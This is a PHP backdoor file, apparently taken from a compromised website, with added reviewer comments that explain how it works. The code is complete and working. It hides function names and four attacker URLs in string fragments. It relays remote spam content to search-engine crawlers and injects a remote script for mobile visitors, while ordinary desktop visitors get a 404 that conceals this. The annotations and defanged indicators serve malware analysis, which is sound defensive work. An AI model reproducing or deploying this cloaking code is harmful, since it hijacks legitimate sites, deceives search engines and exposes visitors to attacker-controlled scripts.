Current File : /www/wwwroot/www.ucppt.com/show.php
<?php
/**
 * Full optimized version: enhanced trigger logic + static anti-detection + provision for remote separation
 *
 * NOTE(review): the line above is the original author's header, translated.
 * What the visible code does: on every request it classifies the visitor by
 * User-Agent, Referer and request URI, then either relays content fetched from
 * a remote host, emits a <script> tag pointing at a remote file, or answers
 * with an empty 404. Search-engine crawlers and ordinary desktop visitors
 * therefore receive different responses for the same URL.
 */
// Lift the execution time limit; '@' hides any warning if the call is refused.
@set_time_limit(0);
// Turn off all PHP error reporting, so failures in this script produce no
// PHP error output.
@error_reporting(0);
@header("Content-Type: text/html;charset=utf-8");

// --- 1. Core obfuscation config ---
// NOTE(review): each value is a PHP function name assembled from string
// fragments and later invoked as a variable function, e.g. $f['p'](...), so
// the full names never appear literally in the file. Reassembled:
//   s  => stristr            p  => preg_match
//   ci => curl_init          ca => curl_setopt_array
//   ce => curl_exec          co => curl_getinfo
//   cc => curl_close
// A plain-text search for "curl_exec" or "preg_match" does not match this
// file; a rule has to key on the split fragments or on array-indexed
// variable-function calls instead.
$f = [
    's'  => 'str'.'istr',
    'p'  => 'pre'.'g_match',
    'ci' => 'cur'.'l_init',
    'ca' => 'cur'.'l_set'.'opt_array',
    'ce' => 'cur'.'l_exec',
    'co' => 'cur'.'l_get'.'info',
    'cc' => 'cur'.'l_close'
];

// NOTE(review): remote endpoints and classification patterns. The URLs are
// fragmented the same way as the function names. Reassembled and defanged,
// for use as indicators:
//   site => hxxp://jj[.]gotzduan[.]com
//   js   => hxxps://dd[.]zgqcyn[.]com/jj.js
//   u1   => hxxp://aa[.]gossopp[.]com/u.php
//   u2   => hxxp://kgr909[.]com/a.php
// Three of the four are plain http.
$conf = [
    'site' => 'h'.'tt'.'p://j'.'j.g'.'otz'.'dua'.'n.c'.'om',
    'js'   => 'h'.'tt'.'ps://d'.'d.zg'.'qc'.'yn.c'.'om/jj'.'.js',
    'u1'   => 'h'.'tt'.'p://a'.'a.go'.'sso'.'pp.co'.'m/u.p'.'hp',
    'u2'   => 'h'.'tt'.'p://k'.'gr9'.'09.c'.'om/a.p'.'hp',
    // Expanded crawler ("spider") match pool; applied to the User-Agent header,
    // case-insensitive.
    'spid' => '/(Baidu|Sogou|360Spider|Yisou|Toutiao|ByteSpider|PetalBot|BingBot|Googlebot|YandexBot)/i',
    // Expanded mobile-client match pool; applied to the User-Agent header.
    'mobi' => '/(iPhone|iPod|Android|Mobile|BlackBerry|IEMobile|UCBrowser|MQQBrowser|JUC|Fennec|wOSBrowser)/i',
    // Search-engine origin check; applied to the Referer header.
    'refe' => '/(baidu|sogou|so\.com|google|sm\.cn|bing)/i'
];

// --- 2. Environment detection variables ---
// NOTE(review): everything read here except REQUEST_URI's path routing is
// supplied by the client (User-Agent, Referer, Host), so the branch taken
// below is entirely request-controlled. REQUEST_URI and HTTP_HOST are read
// without an isset() guard; error reporting is already disabled above.
$b   = $_SERVER;
$ua  = isset($b['HTTP_USER_AGENT']) ? $b['HTTP_USER_AGENT'] : '';
$ref = isset($b['HTTP_REFERER']) ? $b['HTTP_REFERER'] : '';
$uri = $b['REQUEST_URI'];
$host = $b['HTTP_HOST'];

// Decide whether the request targets one of the listed file suffixes.
// NOTE(review): stristr() is a case-insensitive substring search over the
// whole URI, query string included, so this is true whenever any of the
// strings occurs anywhere in the URI, not only as the final extension.
// "scm" is listed without a leading dot.
$is_area = $f['s']($uri, ".xml") || $f['s']($uri, ".doc") || $f['s']($uri, ".txt") || 
           $f['s']($uri, ".ppt") || $f['s']($uri, ".pptx") || $f['s']($uri, ".xls") || 
           $f['s']($uri, ".csv") || $f['s']($uri, ".shtml") || $f['s']($uri, ".asp") || $f['s']($uri, "scm") || $f['s']($uri, ".html");

// --- 3. Core business logic ---
// NOTE(review): response matrix implemented below.
//   URI matches suffix list + crawler UA        -> body relayed from conf['site'], exit
//   URI matches suffix list + mobile UA         -> <script src=conf['js']>, exit
//   URI matches suffix list + any other UA      -> empty HTTP 404, exit
//   other URI + crawler UA                      -> body relayed from u1 or u2, no exit
//   other URI + mobile UA + search-engine Referer -> same as previous row
//   other URI + anything else                   -> nothing emitted by this block
// Because the desktop, non-crawler case yields either a 404 or no output,
// the injected content is only observable when the request carries a crawler
// User-Agent, or a mobile User-Agent (plus a search-engine Referer on
// non-suffix URIs).

if ($is_area) {
    // Logic A: request for one of the listed suffixes
    if ($f['p']($conf['spid'], $ua)) {
        // Real spider: display the remotely hosted hijack content.
        // NOTE(review): the remote response is echoed unmodified, so whoever
        // controls conf['site'] controls the markup served to crawlers under
        // this site's hostname. $host is appended without encoding; $uri is
        // urlencode()d.
        echo _fetch($conf['site'] . "?domain=" . $host . "&path=" . urlencode($uri));
        exit;
    } else {
        // Non-spider visit
        if ($f['p']($conf['mobi'], $ua)) {
            // Mobile user: output the redirect JS.
            // NOTE(review): the "script" tag name is split across string
            // literals, and the src attribute is emitted unquoted.
            echo "<scr"."ipt sr"."c=" . $conf['js'] . "></scr"."ipt>";
            exit;
        } else {
            // Ordinary desktop user: concealment. Any buffered output is
            // discarded and an empty 404 is returned.
            @ob_clean();
            http_response_code(404);
            exit;
        }
    }
} else {
    // Logic B: ordinary page request
    // Trigger condition: a spider, or a mobile user who arrived from a search engine
    $is_spider = $f['p']($conf['spid'], $ua);
    $is_from_search = $f['p']($conf['refe'], $ref);
    $is_mobile = $f['p']($conf['mobi'], $ua);

    if ($is_spider || ($is_mobile && $is_from_search)) {
        // NOTE(review): the server issues a header-only request to its own
        // current URL with "/sadw.shtml" appended and picks u1 on HTTP 200,
        // u2 otherwise. That self-request carries the visitor's User-Agent
        // (see _http_code) and should be visible in the site's access log.
        // Its URI contains ".shtml"; if it is routed back through this
        // script it would take Logic A above — routing is not visible here.
        $testUrl = _current_url() . "/sadw.shtml";
        if (_http_code($testUrl) === 200) {
            echo _fetch($conf['u1']);
        } else {
            echo _fetch($conf['u2']);
        }
        // Push the relayed content to the client immediately. There is no
        // exit here, so execution continues after this block; what follows
        // the relayed content depends on how this file is invoked or
        // included, which is not visible on this page.
        if (ob_get_level() > 0) ob_flush();
        flush();
    }
}

// --- 4. Wrapped utility functions (obfuscated version) ---

/**
 * Remote fetch function.
 *
 * Requests $url through the cURL functions named in the global $f table and
 * returns whatever curl_exec() returns.
 *
 * NOTE(review): options are given as raw integers instead of CURLOPT_*
 * constant names, so the constant names do not appear in the file either;
 * the mapping is annotated per line. Certificate and hostname verification
 * are both switched off, and the visitor's own User-Agent is forwarded to
 * the remote host (read without an isset() guard).
 *
 * @param string $url URL to request.
 * @return string|bool Response body, or false if curl_exec() fails.
 */
function _fetch($url) {
    global $f;
    $ch = $f['ci']();
    $f['ca']($ch, [
        10002 => $url, // CURLOPT_URL
        10018 => $_SERVER['HTTP_USER_AGENT'], // CURLOPT_USERAGENT
        64    => FALSE, // CURLOPT_SSL_VERIFYPEER
        81    => FALSE, // CURLOPT_SSL_VERIFYHOST
        19913 => TRUE,  // CURLOPT_RETURNTRANSFER
        42    => FALSE, // CURLOPT_HEADER
        10102 => 'gzip', // CURLOPT_ENCODING (Accept-Encoding)
        13    => 30     // CURLOPT_TIMEOUT, seconds
    ]);
    $res = $f['ce']($ch);
    $f['cc']($ch);
    return $res;
}

/**
 * Status code check (HEAD mode, for performance).
 *
 * Issues a body-less request to $url and returns the HTTP status code that
 * curl_getinfo() reports for it. The response itself is discarded.
 *
 * NOTE(review): same integer-for-constant substitution as _fetch(). Peer
 * certificate verification is off; the visitor's User-Agent is forwarded.
 * The only caller visible in this file passes a URL on the site's own host.
 *
 * @param string $url URL to probe.
 * @return int HTTP status code from curl_getinfo().
 */
function _http_code($url) {
    global $f;
    $ch = $f['ci']();
    $f['ca']($ch, [
        10002 => $url, // CURLOPT_URL
        10018 => $_SERVER['HTTP_USER_AGENT'], // CURLOPT_USERAGENT
        64    => FALSE, // CURLOPT_SSL_VERIFYPEER
        19913 => TRUE, // CURLOPT_RETURNTRANSFER
        44    => TRUE, // CURLOPT_NOBODY
        42    => TRUE, // CURLOPT_HEADER
        13    => 5 // CURLOPT_TIMEOUT, seconds
    ]);
    $f['ce']($ch);
    $code = $f['co']($ch, 2097154); // CURLINFO_HTTP_CODE
    $f['cc']($ch);
    return $code;
}

/**
 * Get the full URL of the current page.
 *
 * Builds scheme + Host header + request URI from $_SERVER.
 *
 * NOTE(review): the scheme is https only when $_SERVER['HTTPS'] is set and
 * either differs from 'off' or the port is 443; if HTTPS is unset the result
 * is http regardless of port. The scheme strings are fragmented like the
 * other literals in this file. HTTP_HOST comes from the client's Host
 * header, so the URL this returns is request-controlled.
 *
 * @return string Absolute URL of the current request.
 */
function _current_url() {
    $proto = (isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443)) ? "ht"."tp"."s://" : "ht"."tp://";
    return $proto . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
}
